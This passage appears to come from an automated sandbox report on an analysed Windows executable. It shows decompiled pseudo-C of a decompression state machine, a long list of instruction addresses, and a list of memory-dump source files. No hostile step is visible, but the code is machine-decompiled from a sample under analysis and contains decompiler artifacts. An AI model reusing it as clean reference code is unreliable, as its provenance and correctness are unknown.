                                                                        															__eax = __eax - __ecx;
                                                                        															__edi = __edi + 1;
                                                                        															__eflags = __edi;
                                                                        															 *(__ebp - 0x44) = __ebx;
                                                                        															 *__esi = __ax;
                                                                        															 *(__ebp - 0x50) = __edi;
                                                                        														} else {
                                                                        															 *(__ebp - 0x10) = __edx;
                                                                        															0x800 = 0x800 - __ecx;
                                                                        															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                        															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                        															 *__esi = __dx;
                                                                        														}
                                                                        														__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                        														if( *(__ebp - 0x10) >= 0x1000000) {
                                                                        															L111:
                                                                        															_t368 = __ebp - 0x48;
                                                                        															 *_t368 =  *(__ebp - 0x48) + 1;
                                                                        															__eflags =  *_t368;
                                                                        															goto L112;
                                                                        														} else {
                                                                        															goto L109;
                                                                        														}
                                                                        													}
                                                                        													__ecx =  *(__ebp - 0xc);
                                                                        													__ebx = __ebx + __ebx;
                                                                        													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                        													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                        													 *(__ebp - 0x44) = __ebx;
                                                                        													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                        														__ecx =  *(__ebp - 0x10);
                                                                        														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                        														__ebx = __ebx | 0x00000001;
                                                                        														__eflags = __ebx;
                                                                        														 *(__ebp - 0x44) = __ebx;
                                                                        													}
                                                                        													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                        													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                        														L101:
                                                                        														_t338 = __ebp - 0x48;
                                                                        														 *_t338 =  *(__ebp - 0x48) - 1;
                                                                        														__eflags =  *_t338;
                                                                        														goto L102;
                                                                        													} else {
                                                                        														goto L99;
                                                                        													}
                                                                        												}
                                                                        												__edx =  *(__ebp - 4);
                                                                        												__eax = __eax - __ebx;
                                                                        												 *(__ebp - 0x40) = __ecx;
                                                                        												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                        												goto L108;
                                                                        											case 0x1a:
                                                                        												L56:
                                                                        												__eflags =  *(__ebp - 0x64);
                                                                        												if( *(__ebp - 0x64) == 0) {
                                                                        													 *(__ebp - 0x88) = 0x1a;
                                                                        													goto L170;
                                                                        												}
                                                                        												__ecx =  *(__ebp - 0x68);
                                                                        												__al =  *(__ebp - 0x5c);
                                                                        												__edx =  *(__ebp - 8);
                                                                        												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                        												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                        												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                        												 *( *(__ebp - 0x68)) = __al;
                                                                        												__ecx =  *(__ebp - 0x14);
                                                                        												 *(__ecx +  *(__ebp - 8)) = __al;
                                                                        												__eax = __ecx + 1;
                                                                        												__edx = 0;
                                                                        												_t192 = __eax %  *(__ebp - 0x74);
                                                                        												__eax = __eax /  *(__ebp - 0x74);
                                                                        												__edx = _t192;
                                                                        												goto L80;
                                                                        											case 0x1b:
                                                                        												L76:
                                                                        												__eflags =  *(__ebp - 0x64);
                                                                        												if( *(__ebp - 0x64) == 0) {
                                                                        													 *(__ebp - 0x88) = 0x1b;
                                                                        													goto L170;
                                                                        												}
                                                                        												__eax =  *(__ebp - 0x14);
                                                                        												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                        												__eflags = __eax -  *(__ebp - 0x74);
                                                                        												if(__eax >=  *(__ebp - 0x74)) {
                                                                        													__eax = __eax +  *(__ebp - 0x74);
                                                                        													__eflags = __eax;
                                                                        												}
                                                                        												__edx =  *(__ebp - 8);
                                                                        												__cl =  *(__eax + __edx);
                                                                        												__eax =  *(__ebp - 0x14);
                                                                        												 *(__ebp - 0x5c) = __cl;
                                                                        												 *(__eax + __edx) = __cl;
                                                                        												__eax = __eax + 1;
                                                                        												__edx = 0;
                                                                        												_t275 = __eax %  *(__ebp - 0x74);
                                                                        												__eax = __eax /  *(__ebp - 0x74);
                                                                        												__edx = _t275;
                                                                        												__eax =  *(__ebp - 0x68);
                                                                        												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                        												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                        												_t284 = __ebp - 0x64;
                                                                        												 *_t284 =  *(__ebp - 0x64) - 1;
                                                                        												__eflags =  *_t284;
                                                                        												 *( *(__ebp - 0x68)) = __cl;
                                                                        												L80:
                                                                        												 *(__ebp - 0x14) = __edx;
                                                                        												goto L81;
                                                                        											case 0x1c:
                                                                        												while(1) {
                                                                        													L123:
                                                                        													__eflags =  *(__ebp - 0x64);
                                                                        													if( *(__ebp - 0x64) == 0) {
                                                                        														break;
                                                                        													}
                                                                        													__eax =  *(__ebp - 0x14);
                                                                        													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                        													__eflags = __eax -  *(__ebp - 0x74);
                                                                        													if(__eax >=  *(__ebp - 0x74)) {
                                                                        														__eax = __eax +  *(__ebp - 0x74);
                                                                        														__eflags = __eax;
                                                                        													}
                                                                        													__edx =  *(__ebp - 8);
                                                                        													__cl =  *(__eax + __edx);
                                                                        													__eax =  *(__ebp - 0x14);
                                                                        													 *(__ebp - 0x5c) = __cl;
                                                                        													 *(__eax + __edx) = __cl;
                                                                        													__eax = __eax + 1;
                                                                        													__edx = 0;
                                                                        													_t414 = __eax %  *(__ebp - 0x74);
                                                                        													__eax = __eax /  *(__ebp - 0x74);
                                                                        													__edx = _t414;
                                                                        													__eax =  *(__ebp - 0x68);
                                                                        													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                        													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                        													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                        													__eflags =  *(__ebp - 0x30);
                                                                        													 *( *(__ebp - 0x68)) = __cl;
                                                                        													 *(__ebp - 0x14) = _t414;
                                                                        													if( *(__ebp - 0x30) > 0) {
                                                                        														continue;
                                                                        													} else {
                                                                        														L81:
                                                                        														 *(__ebp - 0x88) = 2;
                                                                        														goto L1;
                                                                        													}
                                                                        												}
                                                                        												 *(__ebp - 0x88) = 0x1c;
                                                                        												goto L170;
                                                                        										}
                                                                        									}
                                                                        									L171:
                                                                        									_t535 = _t534 | 0xffffffff;
                                                                        									goto L172;
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					goto L1;
                                                                        				}
                                                                        			}













                                                                        0x00000000
                                                                        0x0040711c
                                                                        0x0040711c
                                                                        0x00407120
                                                                        0x0040712d
                                                                        0x00407137
                                                                        0x00000000
                                                                        0x00407122
                                                                        0x00407122
                                                                        0x0040715d
                                                                        0x00407160
                                                                        0x00407163
                                                                        0x00407166
                                                                        0x00407166
                                                                        0x00407169
                                                                        0x00407170
                                                                        0x00407175
                                                                        0x00407056
                                                                        0x00407059
                                                                        0x004073cb
                                                                        0x004073cb
                                                                        0x004073cb
                                                                        0x004073ce
                                                                        0x004073ce
                                                                        0x004073ce
                                                                        0x004073d4
                                                                        0x004073da
                                                                        0x004073e0
                                                                        0x004073fa
                                                                        0x004073fd
                                                                        0x00407403
                                                                        0x0040740e
                                                                        0x00407410
                                                                        0x004073e2
                                                                        0x004073e2
                                                                        0x004073f1
                                                                        0x004073f5
                                                                        0x004073f5
                                                                        0x0040741a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040741c
                                                                        0x00407420
                                                                        0x004075cf
                                                                        0x004075e5
                                                                        0x004075ed
                                                                        0x004075f4
                                                                        0x004075f6
                                                                        0x004075fd
                                                                        0x00407601
                                                                        0x00407601
                                                                        0x0040742c
                                                                        0x00407433
                                                                        0x0040743b
                                                                        0x0040743e
                                                                        0x00407441
                                                                        0x00407441
                                                                        0x00407447
                                                                        0x00407447
                                                                        0x00406be3
                                                                        0x00406be3
                                                                        0x00406be3
                                                                        0x00406bec
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406bf2
                                                                        0x00000000
                                                                        0x00406bfd
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406c06
                                                                        0x00406c09
                                                                        0x00406c0c
                                                                        0x00406c10
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406c16
                                                                        0x00406c19
                                                                        0x00406c1b
                                                                        0x00406c1c
                                                                        0x00406c1f
                                                                        0x00406c21
                                                                        0x00406c22
                                                                        0x00406c24
                                                                        0x00406c27
                                                                        0x00406c2c
                                                                        0x00406c31
                                                                        0x00406c3a
                                                                        0x00406c4d
                                                                        0x00406c50
                                                                        0x00406c5c
                                                                        0x00406c84
                                                                        0x00406c86
                                                                        0x00406c94
                                                                        0x00406c94
                                                                        0x00406c98
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406c88
                                                                        0x00406c88
                                                                        0x00406c8b
                                                                        0x00406c8c
                                                                        0x00406c8c
                                                                        0x00000000
                                                                        0x00406c88
                                                                        0x00406c62
                                                                        0x00406c67
                                                                        0x00406c67
                                                                        0x00406c70
                                                                        0x00406c78
                                                                        0x00406c7b
                                                                        0x00000000
                                                                        0x00406c81
                                                                        0x00406c81
                                                                        0x00000000
                                                                        0x00406c81
                                                                        0x00000000
                                                                        0x00406c9e
                                                                        0x00406c9e
                                                                        0x00406ca2
                                                                        0x0040754e
                                                                        0x00000000
                                                                        0x0040754e
                                                                        0x00406cab
                                                                        0x00406cbb
                                                                        0x00406cbe
                                                                        0x00406cc1
                                                                        0x00406cc1
                                                                        0x00406cc1
                                                                        0x00406cc4
                                                                        0x00406cc8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406cca
                                                                        0x00406cd0
                                                                        0x00406cfa
                                                                        0x00406d00
                                                                        0x00406d07
                                                                        0x00000000
                                                                        0x00406d07
                                                                        0x00406cd6
                                                                        0x00406cd9
                                                                        0x00406cde
                                                                        0x00406cde
                                                                        0x00406ce9
                                                                        0x00406cf1
                                                                        0x00406cf4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406d39
                                                                        0x00406d3f
                                                                        0x00406d42
                                                                        0x00406d4f
                                                                        0x00406d57
                                                                        0x004073cb
                                                                        0x004073cb
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406d0e
                                                                        0x00406d0e
                                                                        0x00406d12
                                                                        0x0040755d
                                                                        0x00000000
                                                                        0x0040755d
                                                                        0x00406d1e
                                                                        0x00406d29
                                                                        0x00406d29
                                                                        0x00406d29
                                                                        0x00406d2c
                                                                        0x00406d2f
                                                                        0x00406d32
                                                                        0x00406d37
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004073ce
                                                                        0x004073ce
                                                                        0x004073d4
                                                                        0x004073da
                                                                        0x004073e0
                                                                        0x004073fa
                                                                        0x004073fd
                                                                        0x00407403
                                                                        0x0040740e
                                                                        0x00407410
                                                                        0x004073e2
                                                                        0x004073e2
                                                                        0x004073f1
                                                                        0x004073f5
                                                                        0x004073f5
                                                                        0x0040741a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406d5f
                                                                        0x00406d61
                                                                        0x00406d64
                                                                        0x00406dd5
                                                                        0x00406dd8
                                                                        0x00406ddb
                                                                        0x00406de2
                                                                        0x00406dec
                                                                        0x004073cb
                                                                        0x004073cb
                                                                        0x004073cb
                                                                        0x00000000
                                                                        0x004073cb
                                                                        0x004073cb
                                                                        0x00406d66
                                                                        0x00406d6a
                                                                        0x00406d6d
                                                                        0x00406d6f
                                                                        0x00406d72
                                                                        0x00406d75
                                                                        0x00406d77
                                                                        0x00406d7a
                                                                        0x00406d7c
                                                                        0x00406d81
                                                                        0x00406d84
                                                                        0x00406d87
                                                                        0x00406d8b
                                                                        0x00406d92
                                                                        0x00406d95
                                                                        0x00406d9c
                                                                        0x00406da0
                                                                        0x00406da8
                                                                        0x00406da8
                                                                        0x00406da8
                                                                        0x00406da2
                                                                        0x00406da2
                                                                        0x00406da2
                                                                        0x00406d97
                                                                        0x00406d97
                                                                        0x00406d97
                                                                        0x00406dac
                                                                        0x00406daf
                                                                        0x00406dcd
                                                                        0x00406dcf
                                                                        0x00000000
                                                                        0x00406db1
                                                                        0x00406db1
                                                                        0x00406db4
                                                                        0x00406db7
                                                                        0x00406dba
                                                                        0x00406dbc
                                                                        0x00406dbc
                                                                        0x00406dbc
                                                                        0x00406dbf
                                                                        0x00406dc2
                                                                        0x00406dc4
                                                                        0x00406dc5
                                                                        0x00406dc8
                                                                        0x00000000
                                                                        0x00406dc8
                                                                        0x00000000
                                                                        0x00406ffe
                                                                        0x00407002
                                                                        0x00407020
                                                                        0x00407023
                                                                        0x0040702a
                                                                        0x0040702d
                                                                        0x00407030
                                                                        0x00407033
                                                                        0x00407036
                                                                        0x00407039
                                                                        0x0040703b
                                                                        0x00407042
                                                                        0x00407043
                                                                        0x00407045
                                                                        0x00407048
                                                                        0x0040704b
                                                                        0x0040704e
                                                                        0x0040704e
                                                                        0x00407053
                                                                        0x00000000
                                                                        0x00407053
                                                                        0x00407004
                                                                        0x00407007
                                                                        0x0040700a
                                                                        0x00407014
                                                                        0x004073cb
                                                                        0x004073cb
                                                                        0x004073cb
                                                                        0x00000000
                                                                        0x004073cb
                                                                        0x00000000
                                                                        0x00407068
                                                                        0x0040706c
                                                                        0x0040708f
                                                                        0x00407092
                                                                        0x00407095
                                                                        0x0040709f
                                                                        0x0040706e
                                                                        0x0040706e
                                                                        0x00407071
                                                                        0x00407074
                                                                        0x00407077
                                                                        0x00407084
                                                                        0x00407087
                                                                        0x00407087
                                                                        0x004073cb
                                                                        0x004073cb
                                                                        0x004073cb
                                                                        0x00000000
                                                                        0x004073cb
                                                                        0x00000000
                                                                        0x004070ab
                                                                        0x004070af
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004070b5
                                                                        0x004070b9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004070bf
                                                                        0x004070c1
                                                                        0x004070c5
                                                                        0x004070c5
                                                                        0x004070c8
                                                                        0x004070cc
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407143
                                                                        0x00407147
                                                                        0x0040714e
                                                                        0x00407151
                                                                        0x00407154
                                                                        0x00407149
                                                                        0x00407149
                                                                        0x00407149
                                                                        0x00407157
                                                                        0x0040715a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407203
                                                                        0x00407203
                                                                        0x00407207
                                                                        0x004075a5
                                                                        0x00000000
                                                                        0x004075a5
                                                                        0x0040720d
                                                                        0x00407210
                                                                        0x00407213
                                                                        0x00407217
                                                                        0x0040721a
                                                                        0x00407220
                                                                        0x00407222
                                                                        0x00407222
                                                                        0x00407222
                                                                        0x00407225
                                                                        0x00407228
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406df8
                                                                        0x00406df8
                                                                        0x00406dfc
                                                                        0x00407569
                                                                        0x00000000
                                                                        0x00407569
                                                                        0x00406e02
                                                                        0x00406e05
                                                                        0x00406e08
                                                                        0x00406e0c
                                                                        0x00406e0f
                                                                        0x00406e15
                                                                        0x00406e17
                                                                        0x00406e17
                                                                        0x00406e17
                                                                        0x00406e1a
                                                                        0x00406e1d
                                                                        0x00406e1d
                                                                        0x00406e20
                                                                        0x00406e23
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406e29
                                                                        0x00406e2f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406e35
                                                                        0x00406e35
                                                                        0x00406e39
                                                                        0x00406e3c
                                                                        0x00406e3f
                                                                        0x00406e42
                                                                        0x00406e45
                                                                        0x00406e46
                                                                        0x00406e49
                                                                        0x00406e4b
                                                                        0x00406e51
                                                                        0x00406e54
                                                                        0x00406e57
                                                                        0x00406e5a
                                                                        0x00406e5d
                                                                        0x00406e60
                                                                        0x00406e63
                                                                        0x00406e7f
                                                                        0x00406e82
                                                                        0x00406e85
                                                                        0x00406e88
                                                                        0x00406e8f
                                                                        0x00406e93
                                                                        0x00406e95
                                                                        0x00406e99
                                                                        0x00406e65
                                                                        0x00406e65
                                                                        0x00406e69
                                                                        0x00406e71
                                                                        0x00406e76
                                                                        0x00406e78
                                                                        0x00406e7a
                                                                        0x00406e7a
                                                                        0x00406e9c
                                                                        0x00406ea3
                                                                        0x00406ea6
                                                                        0x00000000
                                                                        0x00406eac
                                                                        0x00000000
                                                                        0x00406eac
                                                                        0x00000000
                                                                        0x00406eb1
                                                                        0x00406eb1
                                                                        0x00406eb5
                                                                        0x00407575
                                                                        0x00000000
                                                                        0x00407575
                                                                        0x00406ebb
                                                                        0x00406ebe
                                                                        0x00406ec1
                                                                        0x00406ec5
                                                                        0x00406ec8
                                                                        0x00406ece
                                                                        0x00406ed0
                                                                        0x00406ed0
                                                                        0x00406ed0
                                                                        0x00406ed3
                                                                        0x00406ed6
                                                                        0x00406ed6
                                                                        0x00406ed6
                                                                        0x00406edc
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406ede
                                                                        0x00406ee1
                                                                        0x00406ee4
                                                                        0x00406ee7
                                                                        0x00406eea
                                                                        0x00406eed
                                                                        0x00406ef0
                                                                        0x00406ef3
                                                                        0x00406ef6
                                                                        0x00406ef9
                                                                        0x00406efc
                                                                        0x00406f14
                                                                        0x00406f17
                                                                        0x00406f1a
                                                                        0x00406f1d
                                                                        0x00406f1d
                                                                        0x00406f20
                                                                        0x00406f24
                                                                        0x00406f26
                                                                        0x00406efe
                                                                        0x00406efe
                                                                        0x00406f06
                                                                        0x00406f0b
                                                                        0x00406f0d
                                                                        0x00406f0f
                                                                        0x00406f0f
                                                                        0x00406f29
                                                                        0x00406f30
                                                                        0x00406f33
                                                                        0x00000000
                                                                        0x00406f35
                                                                        0x00000000
                                                                        0x00406f35
                                                                        0x00406f33
                                                                        0x00406f3a
                                                                        0x00406f3a
                                                                        0x00406f3a
                                                                        0x00406f3a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406f75
                                                                        0x00406f75
                                                                        0x00406f79
                                                                        0x00407581
                                                                        0x00000000
                                                                        0x00407581
                                                                        0x00406f7f
                                                                        0x00406f82
                                                                        0x00406f85
                                                                        0x00406f89
                                                                        0x00406f8c
                                                                        0x00406f92
                                                                        0x00406f94
                                                                        0x00406f94
                                                                        0x00406f94
                                                                        0x00406f97
                                                                        0x00406f9a
                                                                        0x00406f9a
                                                                        0x00406fa0
                                                                        0x00406f3e
                                                                        0x00406f3e
                                                                        0x00406f41
                                                                        0x00000000
                                                                        0x00406f41
                                                                        0x00406fa2
                                                                        0x00406fa2
                                                                        0x00406fa5
                                                                        0x00406fa8
                                                                        0x00406fab
                                                                        0x00406fae
                                                                        0x00406fb1
                                                                        0x00406fb4
                                                                        0x00406fb7
                                                                        0x00406fba
                                                                        0x00406fbd
                                                                        0x00406fc0
                                                                        0x00406fd8
                                                                        0x00406fdb
                                                                        0x00406fde
                                                                        0x00406fe1
                                                                        0x00406fe1
                                                                        0x00406fe4
                                                                        0x00406fe8
                                                                        0x00406fea
                                                                        0x00406fc2
                                                                        0x00406fc2
                                                                        0x00406fca
                                                                        0x00406fcf
                                                                        0x00406fd1
                                                                        0x00406fd3
                                                                        0x00406fd3
                                                                        0x00406fed
                                                                        0x00406ff4
                                                                        0x00406ff7
                                                                        0x00000000
                                                                        0x00406ff9
                                                                        0x00000000
                                                                        0x00406ff9
                                                                        0x00000000
                                                                        0x00407286
                                                                        0x00407286
                                                                        0x0040728a
                                                                        0x004075b1
                                                                        0x00000000
                                                                        0x004075b1
                                                                        0x00407290
                                                                        0x00407293
                                                                        0x00407296
                                                                        0x0040729a
                                                                        0x0040729d
                                                                        0x004072a3
                                                                        0x004072a5
                                                                        0x004072a5
                                                                        0x004072a5
                                                                        0x004072a8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407395
                                                                        0x00407399
                                                                        0x004073bb
                                                                        0x004073be
                                                                        0x004073c8
                                                                        0x004073cb
                                                                        0x004073cb
                                                                        0x004073cb
                                                                        0x00000000
                                                                        0x004073cb
                                                                        0x004073cb
                                                                        0x0040739b
                                                                        0x0040739e
                                                                        0x004073a2
                                                                        0x004073a5
                                                                        0x004073a5
                                                                        0x004073a8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407452
                                                                        0x00407456
                                                                        0x00407474
                                                                        0x00407474
                                                                        0x00407474
                                                                        0x0040747b
                                                                        0x00407482
                                                                        0x00407489
                                                                        0x00407489
                                                                        0x00000000
                                                                        0x00407489
                                                                        0x00407458
                                                                        0x0040745b
                                                                        0x0040745e
                                                                        0x00407461
                                                                        0x00407468
                                                                        0x004073ac
                                                                        0x004073ac
                                                                        0x004073af
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407543
                                                                        0x00407546
                                                                        0x00407447
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040717d
                                                                        0x0040717f
                                                                        0x00407186
                                                                        0x00407187
                                                                        0x00407189
                                                                        0x0040718c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407194
                                                                        0x00407197
                                                                        0x0040719a
                                                                        0x0040719c
                                                                        0x0040719e
                                                                        0x0040719e
                                                                        0x0040719f
                                                                        0x004071a2
                                                                        0x004071a9
                                                                        0x004071ac
                                                                        0x004071ba
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407490
                                                                        0x00407490
                                                                        0x00407493
                                                                        0x0040749a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040749f
                                                                        0x0040749f
                                                                        0x004074a3
                                                                        0x004075db
                                                                        0x00000000
                                                                        0x004075db
                                                                        0x004074a9
                                                                        0x004074ac
                                                                        0x004074af
                                                                        0x004074b3
                                                                        0x004074b6
                                                                        0x004074bc
                                                                        0x004074be
                                                                        0x004074be
                                                                        0x004074be
                                                                        0x004074c1
                                                                        0x004074c4
                                                                        0x004074c4
                                                                        0x004074c4
                                                                        0x004074c4
                                                                        0x004074c7
                                                                        0x004074c7
                                                                        0x004074cb
                                                                        0x0040752b
                                                                        0x0040752e
                                                                        0x00407533
                                                                        0x00407534
                                                                        0x00407536
                                                                        0x00407538
                                                                        0x0040753b
                                                                        0x00407447
                                                                        0x00407447
                                                                        0x00000000
                                                                        0x0040744d
                                                                        0x00407447
                                                                        0x004074cd
                                                                        0x004074d3
                                                                        0x004074d6
                                                                        0x004074d9
                                                                        0x004074dc
                                                                        0x004074df
                                                                        0x004074e2
                                                                        0x004074e5
                                                                        0x004074e8
                                                                        0x004074eb
                                                                        0x004074ee
                                                                        0x00407507
                                                                        0x0040750a
                                                                        0x0040750d
                                                                        0x00407510
                                                                        0x00407514
                                                                        0x00407516
                                                                        0x00407516
                                                                        0x00407517
                                                                        0x0040751a
                                                                        0x004074f0
                                                                        0x004074f0
                                                                        0x004074f8
                                                                        0x004074fd
                                                                        0x004074ff
                                                                        0x00407502
                                                                        0x00407502
                                                                        0x0040751d
                                                                        0x00407524
                                                                        0x00000000
                                                                        0x00407526
                                                                        0x00000000
                                                                        0x00407526
                                                                        0x00000000
                                                                        0x004071c2
                                                                        0x004071c5
                                                                        0x004071fb
                                                                        0x0040732b
                                                                        0x0040732b
                                                                        0x0040732b
                                                                        0x0040732b
                                                                        0x0040732e
                                                                        0x0040732e
                                                                        0x00407331
                                                                        0x00407333
                                                                        0x004075bd
                                                                        0x00000000
                                                                        0x004075bd
                                                                        0x00407339
                                                                        0x0040733c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407342
                                                                        0x00407346
                                                                        0x00407349
                                                                        0x00407349
                                                                        0x00407349
                                                                        0x00000000
                                                                        0x00407349
                                                                        0x004071c7
                                                                        0x004071c9
                                                                        0x004071cb
                                                                        0x004071cd
                                                                        0x004071d0
                                                                        0x004071d1
                                                                        0x004071d3
                                                                        0x004071d5
                                                                        0x004071d8
                                                                        0x004071db
                                                                        0x004071f1
                                                                        0x004071f6
                                                                        0x0040722e
                                                                        0x0040722e
                                                                        0x00407232
                                                                        0x0040725e
                                                                        0x00407260
                                                                        0x00407267
                                                                        0x0040726a
                                                                        0x0040726d
                                                                        0x0040726d
                                                                        0x00407272
                                                                        0x00407272
                                                                        0x00407274
                                                                        0x00407277
                                                                        0x0040727e
                                                                        0x00407281
                                                                        0x004072ae
                                                                        0x004072ae
                                                                        0x004072b1
                                                                        0x004072b4
                                                                        0x00407328
                                                                        0x00407328
                                                                        0x00407328
                                                                        0x00000000
                                                                        0x00407328
                                                                        0x004072b6
                                                                        0x004072bc
                                                                        0x004072bf
                                                                        0x004072c2
                                                                        0x004072c5
                                                                        0x004072c8
                                                                        0x004072cb
                                                                        0x004072ce
                                                                        0x004072d1
                                                                        0x004072d4
                                                                        0x004072d7
                                                                        0x004072f0
                                                                        0x004072f2
                                                                        0x004072f5
                                                                        0x004072f6
                                                                        0x004072f9
                                                                        0x004072fb
                                                                        0x004072fe
                                                                        0x00407300
                                                                        0x00407302
                                                                        0x00407305
                                                                        0x00407307
                                                                        0x0040730a
                                                                        0x0040730e
                                                                        0x00407310
                                                                        0x00407310
                                                                        0x00407311
                                                                        0x00407314
                                                                        0x00407317
                                                                        0x004072d9
                                                                        0x004072d9
                                                                        0x004072e1
                                                                        0x004072e6
                                                                        0x004072e8
                                                                        0x004072eb
                                                                        0x004072eb
                                                                        0x0040731a
                                                                        0x00407321
                                                                        0x004072ab
                                                                        0x004072ab
                                                                        0x004072ab
                                                                        0x004072ab
                                                                        0x00000000
                                                                        0x00407323
                                                                        0x00000000
                                                                        0x00407323
                                                                        0x00407321
                                                                        0x00407234
                                                                        0x00407237
                                                                        0x00407239
                                                                        0x0040723c
                                                                        0x0040723f
                                                                        0x00407242
                                                                        0x00407244
                                                                        0x00407247
                                                                        0x0040724a
                                                                        0x0040724a
                                                                        0x0040724d
                                                                        0x0040724d
                                                                        0x00407250
                                                                        0x00407257
                                                                        0x0040722b
                                                                        0x0040722b
                                                                        0x0040722b
                                                                        0x0040722b
                                                                        0x00000000
                                                                        0x00407259
                                                                        0x00000000
                                                                        0x00407259
                                                                        0x00407257
                                                                        0x004071dd
                                                                        0x004071e0
                                                                        0x004071e2
                                                                        0x004071e5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406f44
                                                                        0x00406f44
                                                                        0x00406f48
                                                                        0x0040758d
                                                                        0x00000000
                                                                        0x0040758d
                                                                        0x00406f4e
                                                                        0x00406f51
                                                                        0x00406f54
                                                                        0x00406f57
                                                                        0x00406f5a
                                                                        0x00406f5d
                                                                        0x00406f60
                                                                        0x00406f62
                                                                        0x00406f65
                                                                        0x00406f68
                                                                        0x00406f6b
                                                                        0x00406f6d
                                                                        0x00406f6d
                                                                        0x00406f6d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004070cf
                                                                        0x004070cf
                                                                        0x004070d3
                                                                        0x00407599
                                                                        0x00000000
                                                                        0x00407599
                                                                        0x004070d9
                                                                        0x004070dc
                                                                        0x004070df
                                                                        0x004070e2
                                                                        0x004070e4
                                                                        0x004070e4
                                                                        0x004070e4
                                                                        0x004070e7
                                                                        0x004070ea
                                                                        0x004070ed
                                                                        0x004070f0
                                                                        0x004070f3
                                                                        0x004070f6
                                                                        0x004070f7
                                                                        0x004070f9
                                                                        0x004070f9
                                                                        0x004070f9
                                                                        0x004070fc
                                                                        0x004070ff
                                                                        0x00407102
                                                                        0x00407105
                                                                        0x00407105
                                                                        0x00407105
                                                                        0x00407108
                                                                        0x0040710a
                                                                        0x0040710a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040734c
                                                                        0x0040734c
                                                                        0x0040734c
                                                                        0x00407350
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407356
                                                                        0x00407359
                                                                        0x0040735c
                                                                        0x0040735f
                                                                        0x00407361
                                                                        0x00407361
                                                                        0x00407361
                                                                        0x00407364
                                                                        0x00407367
                                                                        0x0040736a
                                                                        0x0040736d
                                                                        0x00407370
                                                                        0x00407373
                                                                        0x00407374
                                                                        0x00407376
                                                                        0x00407376
                                                                        0x00407376
                                                                        0x00407379
                                                                        0x0040737c
                                                                        0x0040737f
                                                                        0x00407382
                                                                        0x00407385
                                                                        0x00407389
                                                                        0x0040738b
                                                                        0x0040738e
                                                                        0x00000000
                                                                        0x00407390
                                                                        0x0040710d
                                                                        0x0040710d
                                                                        0x00000000
                                                                        0x0040710d
                                                                        0x0040738e
                                                                        0x004075c3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406bf2
                                                                        0x004075fa
                                                                        0x004075fa
                                                                        0x00000000
                                                                        0x004075fa
                                                                        0x00407447
                                                                        0x004073ce
                                                                        0x004073cb
                                                                        0x00000000
                                                                        0x00407120

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
